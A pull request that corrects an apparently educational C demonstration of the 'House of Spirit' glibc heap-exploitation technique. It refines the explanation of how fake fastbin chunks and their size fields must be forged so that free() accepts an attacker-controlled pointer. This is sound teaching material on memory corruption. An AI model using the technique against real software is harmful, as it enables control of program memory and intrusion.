### PR TITLE
Make the House of Spirit description more precise

### DIFF
--- a/house_of_spirit.c
+++ b/house_of_spirit.c
@@ -14,15 +14,15 @@ int main()
 
 	printf("This region must contain two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[7]);
 
-	printf("This chunk.size of this region has to be 16 more than the the region (to accomodate the chunk data), with the 'used' bit set.\n");
-	printf("... note that this has to be the size of the next malloc (plus the chunk header).\n");
-	fake_chunks[1] = 0x41; // this is the size
+	printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
+	printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
+	fake_chunks[1] = 0x40; // this is the size
 
-	printf("The chunk.size of the *next* fake region also has to make sense (be small enough) to pass libc's checks. The free bit doesn't matter.\n");
-	fake_chunks[9] = 0x30; // can be whatever as long as it's small enough for a fastbin
+	printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .\n");
+	fake_chunks[9] = 0x2240; // nextsize
 
 	printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
-	printf("... note that the memory address of the *region* associated with this chunk (i.e., chunk+8) must be 16-byte aligned.\n");
+	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
 	a = &fake_chunks[2];
 
 	printf("Freeing the overwritten pointer.\n");


### PR DESCRIPTION
Currently it has an inaccuracy (that you need the PREV_INUSE bit set for the fake chunk) but I've also added more precise info about size limits.